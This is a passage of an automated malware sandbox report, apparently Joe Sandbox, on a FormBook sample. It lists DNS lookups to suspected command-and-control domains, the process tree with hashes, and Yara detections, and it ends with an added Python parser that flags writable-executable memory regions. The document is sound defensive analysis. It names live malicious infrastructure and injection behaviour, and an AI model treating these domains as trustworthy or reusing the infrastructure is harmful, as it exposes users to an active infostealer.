Mar 20, 2023 17:52:17.492475033 CET | 53          | 56751     | 8.8.8.8     | 192.168.2.5
Mar 20, 2023 17:52:25.764822006 CET | 55039       | 53        | 192.168.2.5 | 8.8.8.8
Mar 20, 2023 17:52:25.884392023 CET | 53          | 55039     | 8.8.8.8     | 192.168.2.5
DNS Queries

Timestamp                           | Source IP   | Dest IP | Trans ID | OP Code            | Name                          | Type           | Class       | DNS over HTTPS
Mar 20, 2023 17:51:05.616214037 CET | 192.168.2.5 | 8.8.8.8 | 0x82a4   | Standard query (0) | www.white-hat.uk              | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:51:10.996087074 CET | 192.168.2.5 | 8.8.8.8 | 0x2eff   | Standard query (0) | www.gritslab.com              | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:51:18.648199081 CET | 192.168.2.5 | 8.8.8.8 | 0xa7e2   | Standard query (0) | www.bitservicesltd.com        | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:51:26.386713982 CET | 192.168.2.5 | 8.8.8.8 | 0x32b8   | Standard query (0) | www.222ambking.org            | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:51:34.164959908 CET | 192.168.2.5 | 8.8.8.8 | 0x9d86   | Standard query (0) | www.energyservicestation.com  | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:51:42.216943026 CET | 192.168.2.5 | 8.8.8.8 | 0x9c78   | Standard query (0) | www.younrock.com              | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:51:49.884217978 CET | 192.168.2.5 | 8.8.8.8 | 0xcc3a   | Standard query (0) | www.thewildphotographer.co.uk | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:51:58.059444904 CET | 192.168.2.5 | 8.8.8.8 | 0xaf85   | Standard query (0) | www.shapshit.xyz              | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:52:06.919426918 CET | 192.168.2.5 | 8.8.8.8 | 0xbcdf   | Standard query (0) | www.thedivinerudraksha.com    | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:52:16.333122969 CET | 192.168.2.5 | 8.8.8.8 | 0x4dc3   | Standard query (0) | www.fclaimrewardccpointq.shop | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:52:17.446403027 CET | 192.168.2.5 | 8.8.8.8 | 0xca52   | Standard query (0) | www.fclaimrewardccpointq.shop | A (IP address) | IN (0x0001) | false
Mar 20, 2023 17:52:25.764822006 CET | 192.168.2.5 | 8.8.8.8 | 0xb97b   | Standard query (0) | www.un-object.com             | A (IP address) | IN (0x0001) | false
DNS Answers

Timestamp                           | Source IP | Dest IP     | Trans ID | Reply Code     | Name                          | CName                  | Address         | Type                   | Class       | DNS over HTTPS
Mar 20, 2023 17:51:05.659106016 CET | 8.8.8.8   | 192.168.2.5 | 0x82a4   | No error (0)   | www.white-hat.uk              | white-hat.uk           |                 | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 17:51:05.659106016 CET | 8.8.8.8   | 192.168.2.5 | 0x82a4   | No error (0)   | white-hat.uk                  |                        | 94.176.104.86   | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:11.019247055 CET | 8.8.8.8   | 192.168.2.5 | 0x2eff   | No error (0)   | www.gritslab.com              | gritslab.com           |                 | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 17:51:11.019247055 CET | 8.8.8.8   | 192.168.2.5 | 0x2eff   | No error (0)   | gritslab.com                  |                        | 78.141.192.145  | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:18.673597097 CET | 8.8.8.8   | 192.168.2.5 | 0xa7e2   | No error (0)   | www.bitservicesltd.com        |                        | 161.97.163.8    | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:26.421905994 CET | 8.8.8.8   | 192.168.2.5 | 0x32b8   | No error (0)   | www.222ambking.org            |                        | 91.195.240.94   | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:34.197314024 CET | 8.8.8.8   | 192.168.2.5 | 0x9d86   | No error (0)   | www.energyservicestation.com  |                        | 213.145.228.111 | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:42.247035027 CET | 8.8.8.8   | 192.168.2.5 | 0x9c78   | No error (0)   | www.younrock.com              |                        | 81.17.29.149    | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 72.14.185.43    | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 72.14.178.174   | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 45.79.19.196    | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 45.56.79.23     | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 45.33.23.183    | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 45.33.2.79      | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 96.126.123.244  | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 173.255.194.134 | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 45.33.30.197    | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 45.33.20.235    | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 45.33.18.44     | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:50.032006979 CET | 8.8.8.8   | 192.168.2.5 | 0xcc3a   | No error (0)   | www.thewildphotographer.co.uk |                        | 198.58.118.167  | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:51:58.112246037 CET | 8.8.8.8   | 192.168.2.5 | 0xaf85   | No error (0)   | www.shapshit.xyz              |                        | 199.192.30.147  | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:52:07.043114901 CET | 8.8.8.8   | 192.168.2.5 | 0xbcdf   | No error (0)   | www.thedivinerudraksha.com    | thedivinerudraksha.com |                 | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 17:52:07.043114901 CET | 8.8.8.8   | 192.168.2.5 | 0xbcdf   | No error (0)   | thedivinerudraksha.com        |                        | 85.187.128.34   | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:52:16.358932018 CET | 8.8.8.8   | 192.168.2.5 | 0x4dc3   | Name error (3) | www.fclaimrewardccpointq.shop | none                   | none            | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:52:17.492475033 CET | 8.8.8.8   | 192.168.2.5 | 0xca52   | Name error (3) | www.fclaimrewardccpointq.shop | none                   | none            | A (IP address)         | IN (0x0001) | false
Mar 20, 2023 17:52:25.884392023 CET | 8.8.8.8   | 192.168.2.5 | 0xb97b   | No error (0)   | www.un-object.com             | un-object.com          |                 | CNAME (Canonical name) | IN (0x0001) | false
Mar 20, 2023 17:52:25.884392023 CET | 8.8.8.8   | 192.168.2.5 | 0xb97b   | No error (0)   | un-object.com                 |                        | 192.185.17.12   | A (IP address)         | IN (0x0001) | false

• www.white-hat.uk
• www.gritslab.com
• www.bitservicesltd.com
• www.222ambking.org
• www.energyservicestation.com
• www.younrock.com
• www.thewildphotographer.co.uk
• www.shapshit.xyz
• www.thedivinerudraksha.com
• www.un-object.com


Target ID: 0
Start time: 17:50:22
Start date: 20/03/2023
Path: C:\Users\user\Desktop\u8QPnVhq0N.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\Desktop\u8QPnVhq0N.exe
Imagebase: 0x400000
File size: 299979 bytes
MD5 hash: 7DE990046A20E6666627273589B014A5
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: low

Target ID: 1
Start time: 17:50:22
Start date: 20/03/2023
Path: C:\Users\user\AppData\Local\Temp\mcwfy.exe
Wow64 process (32bit): true
Commandline: "C:\Users\user\AppData\Local\Temp\mcwfy.exe" C:\Users\user\AppData\Local\Temp\ytljtt.f
Imagebase: 0x400000
File size: 95232 bytes
MD5 hash: 6CB712E482D150A185F713D75314A75A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Antivirus matches:
• Detection: 100%, Joe Sandbox ML
• Detection: 33%, ReversingLabs
Reputation: low

Target ID: 2
Start time: 17:50:22
Start date: 20/03/2023
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7fcd70000
File size: 625664 bytes
MD5 hash: EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Reputation: high

Target ID: 3
Start time: 17:50:23
Start date: 20/03/2023
Path: C:\Users\user\AppData\Local\Temp\mcwfy.exe
Wow64 process (32bit): true
Commandline: C:\Users\user\AppData\Local\Temp\mcwfy.exe
Imagebase: 0x400000
File size: 95232 bytes
MD5 hash: 6CB712E482D150A185F713D75314A75A
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.361277802.0000000000540000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
Reputation: low

Target ID: 4
Start time: 17:50:31
Start date: 20/03/2023
Path: C:\Windows\explorer.exe
Wow64 process (32bit): false
Commandline: C:\Windows\Explorer.EXE
Imagebase: 0x7ff69bc80000
File size: 3933184 bytes
MD5 hash: AD5296B280E8F522A8A897C96BAB0E1D
Has elevated privileges: false
Has administrator privileges: false
Programmed in: C, C++ or other language
Reputation: high

Target ID:5
Start time:17:50:47
Start date:20/03/2023
Path:C:\Windows\SysWOW64\autoconv.exe
Wow64 process (32bit):false
Commandline:C:\Windows\SysWOW64\autoconv.exe
Imagebase:0x13c0000
File size:851968 bytes
MD5 hash:4506BE56787EDCD771A351C10B5AE3B7
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Reputation:moderate

Target ID:6
Start time:17:50:47
Start date:20/03/2023
Path:C:\Windows\SysWOW64\cmstp.exe
Wow64 process (32bit):true
Commandline:C:\Windows\SysWOW64\cmstp.exe
Imagebase:0x12a0000
File size:82944 bytes
MD5 hash:4833E65ED211C7F118D4A11E6FB58A09
Has elevated privileges:false
Has administrator privileges:false
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567494212.0000000000B40000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
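
The Yara match lines above repeat the same three rules for several memory dumps, and the useful triage question (which process holds Formbook code, at what address, and with what page protection) is buried in the dotted dump name. The following is an added example, written for this report and not part of Joe Sandbox or its tooling, that parses such lines and groups them per region. Only three fields of the dump name are interpreted: the first field is taken as the target ID (the report's own numbering: the cmstp.exe matches all start with 00000006), the fourth as the region's base address, and the fifth as the Win32 PAGE_* protection value (0x40 = PAGE_EXECUTE_READWRITE, 0x04 = PAGE_READWRITE). The base-address and protection interpretations are assumptions; the remaining fields are kept raw. The sample input is a constructed copy of lines from this report.

```python
"""Group Joe Sandbox Yara memory-dump matches per process region and flag W+X pages.

Added example for this report, not Joe Sandbox code. Field meanings for the
dump name  <target>.<f2>.<f3>.<base>.<protect>.<f6>.<f7>.<f8>.sdmp  are:
  target   -> report "Target ID" (supported by the report itself)
  base     -> base address of the dumped region   (assumption)
  protect  -> Win32 memory protection constant     (assumption)
Everything else is preserved but not interpreted.
"""
import re
from collections import defaultdict

# Win32 memory protection constants from winnt.h (low byte of the field).
PAGE_PROTECT = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
WRITE_AND_EXEC = {0x40, 0x80}  # pages that can be written and then executed

MATCH_RE = re.compile(
    r"Rule:\s*(?P<rule>[^,]+),\s*Description:\s*(?P<desc>.*?),\s*"
    r"Source:\s*(?P<source>\S+),\s*Author:\s*(?P<author>.*)$"
)
SOURCE_RE = re.compile(
    r"^(?P<target>[0-9a-f]{8})\.(?P<f2>[0-9a-f]+)\.(?P<f3>[0-9a-f]+)\."
    r"(?P<base>[0-9a-f]{16})\.(?P<protect>[0-9a-f]{8})\."
    r"(?P<rest>[0-9a-f]{8}\.[0-9a-f]{8}\.[0-9a-f]{8})\.sdmp$",
    re.IGNORECASE,
)

# Constructed sample: copies of match lines from this report (targets 3 and 6).
SAMPLE_MATCHES = [
    "• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000003.00000002.361208868.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com",
    "• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.361529431.00000000009F0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security",
    "• Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.566668495.0000000000550000.00000040.80000000.00040000.00000000.sdmp, Author: unknown",
    "• Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security",
    "• Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000006.00000002.567601687.0000000000B70000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com",
]


def parse_match(line):
    """Parse one 'Rule: ..., Source: ....sdmp, Author: ...' line; return None if it does not fit."""
    m = MATCH_RE.search(line.strip().lstrip("•").strip())
    if m is None:
        return None
    s = SOURCE_RE.match(m["source"])
    if s is None:
        return None
    protect = int(s["protect"], 16)
    return {
        "rule": m["rule"].strip(),
        "author": m["author"].strip(),
        "target": int(s["target"], 16),        # report Target ID
        "base": int(s["base"], 16),            # assumed region base address
        "protect": protect,
        "protect_name": PAGE_PROTECT.get(protect & 0xFF, f"0x{protect:08x}"),
        "source": m["source"],
    }


def group_by_region(lines):
    """Map (target id, base address) -> {'protect', 'protect_name', 'rules'} (rules sorted)."""
    regions = defaultdict(lambda: {"protect": None, "protect_name": None, "rules": set()})
    for line in lines:
        rec = parse_match(line)
        if rec is None:
            continue  # non-match text (headers, blank lines) is skipped, not an error
        key = (rec["target"], rec["base"])
        regions[key]["protect"] = rec["protect"]
        regions[key]["protect_name"] = rec["protect_name"]
        regions[key]["rules"].add(rec["rule"])
    return {k: dict(v, rules=sorted(v["rules"])) for k, v in regions.items()}


def rwx_regions(lines):
    """Regions that are writable and executable: where unpacked or injected code normally lives."""
    return sorted(key for key, info in group_by_region(lines).items()
                  if info["protect"] in WRITE_AND_EXEC)


if __name__ == "__main__":
    for (target, base), info in sorted(group_by_region(SAMPLE_MATCHES).items()):
        flag = " <-- W+X" if info["protect"] in WRITE_AND_EXEC else ""
        print(f"target {target} base 0x{base:08x} {info['protect_name']:<24} {', '.join(info['rules'])}{flag}")
```

On the report's lines this collapses the nine cmstp.exe matches into three regions, of which 0x550000 and 0xB40000 are PAGE_EXECUTE_READWRITE and 0xB70000 is plain PAGE_READWRITE; the W+X regions inside a signed Windows binary such as cmstp.exe are the ones worth dumping and comparing with the 0x400000 region of target 3, since they are the result of the process hollowing and unpacking the report flags above.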

No disassembly